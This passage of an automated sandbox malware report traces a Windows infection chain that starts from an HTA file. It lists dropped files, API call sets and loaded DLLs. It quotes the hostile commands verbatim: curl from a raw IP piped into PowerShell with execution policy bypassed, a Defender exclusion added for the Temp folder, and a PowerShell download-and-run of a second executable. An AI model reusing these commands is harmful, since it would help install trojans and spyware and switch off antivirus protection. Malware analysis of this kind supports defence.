            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD5B70 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SHCreateMemStream,SelectObject,DeleteDC,ReleaseDC,DeleteObject,EnterCriticalSection,LeaveCriticalSection,IStream_Size,IStream_Reset,IStream_Read,SelectObject,DeleteDC,ReleaseDC,DeleteObject,12_2_00007FF6F1DD5B70

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\Launcher.exeJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\iviewers.dllJump to dropped file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\io12j1es.2tm.exeJump to dropped file
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DDA430 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,_invalid_parameter_noinfo_noreturn,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,12_2_00007FF6F1DDA430
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD9D30 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,GetCurrentProcess,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,12_2_00007FF6F1DD9D30
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B696346_2_00B69634
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00B7B4A07_2_00B7B4A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00B7B4907_2_00B7B490
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_08423AA87_2_08423AA8
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD833012_2_00007FF6F1DD8330
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D9531012_2_00007FF6F1D95310
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD524012_2_00007FF6F1DD5240
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE918C12_2_00007FF6F1DE918C
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D8045012_2_00007FF6F1D80450
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DB635012_2_00007FF6F1DB6350
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D7F73012_2_00007FF6F1D7F730
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD76A012_2_00007FF6F1DD76A0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1E1065812_2_00007FF6F1E10658
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D8E61012_2_00007FF6F1D8E610
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DDC5CB12_2_00007FF6F1DDC5CB
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1E0B5B012_2_00007FF6F1E0B5B0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D8D57012_2_00007FF6F1D8D570
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD686012_2_00007FF6F1DD6860
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D8CA1012_2_00007FF6F1D8CA10
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DB597012_2_00007FF6F1DB5970
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D82CA012_2_00007FF6F1D82CA0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D8ECB012_2_00007FF6F1D8ECB0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D81B9012_2_00007FF6F1D81B90
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD5B7012_2_00007FF6F1DD5B70
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D84B7012_2_00007FF6F1D84B70
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DF2E3C12_2_00007FF6F1DF2E3C
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D7FE2012_2_00007FF6F1D7FE20
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D820B012_2_00007FF6F1D820B0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DBD08012_2_00007FF6F1DBD080
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DDD05012_2_00007FF6F1DDD050
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DCF02012_2_00007FF6F1DCF020
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D99F8012_2_00007FF6F1D99F80
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DCE2F012_2_00007FF6F1DCE2F0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC02C012_2_00007FF6F1DC02C0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE122012_2_00007FF6F1DE1220
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DF71D812_2_00007FF6F1DF71D8
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D5618012_2_00007FF6F1D56180
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE616412_2_00007FF6F1DE6164
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE315012_2_00007FF6F1DE3150
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D7552012_2_00007FF6F1D75520
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D7651012_2_00007FF6F1D76510
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DF14E412_2_00007FF6F1DF14E4
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DAB48012_2_00007FF6F1DAB480
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DFA44F12_2_00007FF6F1DFA44F
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DAC42012_2_00007FF6F1DAC420
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DCB42012_2_00007FF6F1DCB420
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DDA43012_2_00007FF6F1DDA430
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D783D012_2_00007FF6F1D783D0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DFA3C812_2_00007FF6F1DFA3C8
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC63A612_2_00007FF6F1DC63A6
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE539412_2_00007FF6F1DE5394
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DA472012_2_00007FF6F1DA4720
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DF46E412_2_00007FF6F1DF46E4
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DF36A812_2_00007FF6F1DF36A8
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DF867412_2_00007FF6F1DF8674
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE666C12_2_00007FF6F1DE666C
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D5661012_2_00007FF6F1D56610
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE559812_2_00007FF6F1DE5598
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD654012_2_00007FF6F1DD6540
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DEA92412_2_00007FF6F1DEA924
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DCC8E012_2_00007FF6F1DCC8E0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D898CD12_2_00007FF6F1D898CD
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DEF7E612_2_00007FF6F1DEF7E6
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE579C12_2_00007FF6F1DE579C
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DAB78012_2_00007FF6F1DAB780
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DDA78012_2_00007FF6F1DDA780
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DB275012_2_00007FF6F1DB2750
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC8B0012_2_00007FF6F1DC8B00
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DA1AF012_2_00007FF6F1DA1AF0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DB0AC012_2_00007FF6F1DB0AC0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DABAB012_2_00007FF6F1DABAB0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC5AB012_2_00007FF6F1DC5AB0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D80A8012_2_00007FF6F1D80A80
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DF6A6812_2_00007FF6F1DF6A68
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D83A3012_2_00007FF6F1D83A30
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE0D1412_2_00007FF6F1DE0D14
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DA7CEB12_2_00007FF6F1DA7CEB
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DFBB9012_2_00007FF6F1DFBB90
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC5EF012_2_00007FF6F1DC5EF0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D80E8012_2_00007FF6F1D80E80
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DD0E9012_2_00007FF6F1DD0E90
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D87E7012_2_00007FF6F1D87E70
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DABDD012_2_00007FF6F1DABDD0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D8ADD012_2_00007FF6F1D8ADD0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D55DB012_2_00007FF6F1D55DB0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DC4D4012_2_00007FF6F1DC4D40
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DE8D5012_2_00007FF6F1DE8D50
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DFC12812_2_00007FF6F1DFC128
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DEF0D812_2_00007FF6F1DEF0D8
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D570E012_2_00007FF6F1D570E0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DAC0F012_2_00007FF6F1DAC0F0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DF30B812_2_00007FF6F1DF30B8
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1E0FFBC12_2_00007FF6F1E0FFBC
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D8BF4012_2_00007FF6F1D8BF40
            Source: C:\Windows\Temp\Launcher.exeCode function: String function: 00B6F3E2 appears 34 times
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: String function: 00007FF6F1DE8254 appears 34 times
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: String function: 00007FF6F1D7BA80 appears 32 times
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: String function: 00007FF6F1D986B0 appears 54 times
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: String function: 00007FF6F1D7E1D0 appears 33 times
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: String function: 00007FF6F1D86940 appears 41 times
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@19/14@1/3
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1DDB9B0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,12_2_00007FF6F1DDB9B0
            Source: C:\Windows\Temp\io12j1es.2tm.exeCode function: 12_2_00007FF6F1D8E610 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,12_2_00007FF6F1D8E610
            Source: C:\Windows\Temp\Launcher.exeCode function: 6_2_00B6642D CoCreateInstance,GetUserDefaultLCID,StringFromGUID2,wsprintfW,RegOpenKeyW,RegEnumKeyW,RegOpenKeyW,RegQueryValueExW,wsprintfW,RegCloseKey,RegCloseKey,6_2_00B6642D
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4888:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6696:120:WilError_03
            Source: C:\Windows\Temp\io12j1es.2tm.exeMutant created: \Sessions\1\BaseNamedObjects\Mmm-A33C734061CA11EE8C18806E6F6E6963466ADAAD
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_snp1f1vq.qjo.ps1Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: script.htaVirustotal: Detection: 14%
            Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\script.hta"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s http://147.45.47.15/script.ps1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\Launcher.exe "C:\Windows\Temp\Launcher.exe"
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\Temp\io12j1es.2tm.exe "C:\Windows\Temp\io12j1es.2tm.exe"
            Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c curl -s http://147.45.47.15/script.ps1 | powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\curl.exe curl -s http://147.45.47.15/script.ps1Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -NoProfile -ExecutionPolicy Bypass -Command -Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Temp\Launcher.exe "C:\Windows\Temp\Launcher.exe" Jump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'"Jump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'http://147.45.47.15/duschno.exe' -OutFile 'C:\Windows\Temp\io12j1es.2tm.exe'"Jump to behavior
            Source: C:\Windows\Temp\Launcher.exeProcess created: C:\Windows\Temp\io12j1es.2tm.exe "C:\Windows\Temp\io12j1es.2tm.exe" Jump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\curl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
